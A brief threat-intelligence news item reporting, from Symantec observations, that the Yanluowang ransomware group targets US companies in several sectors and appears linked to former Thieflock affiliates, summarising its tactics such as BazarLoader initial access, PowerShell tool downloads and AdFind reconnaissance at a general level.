Yanluowang Ransomware Linked to Thieflock Affiliate

Yanluowang ransomware group, active since at least August 2021, have been targeting US Corporations, specifically in the financial, manufacturing, IT, consultancy, and engineering sectors. The group has been utilizing TTPs similar to Theiflock ransomware attacks. Based on observations by Symantec, it seems there is a link, or a shifting of allegiances from Thieflock to the Yanluowang ransomware family. Notable noticed TTP patterns have been the usage of BazarLoader for initial access, PowerShell to download tools enabling RDP in the registry, Adfind for reconnaissance, and the usage of other various credential-stealing tools.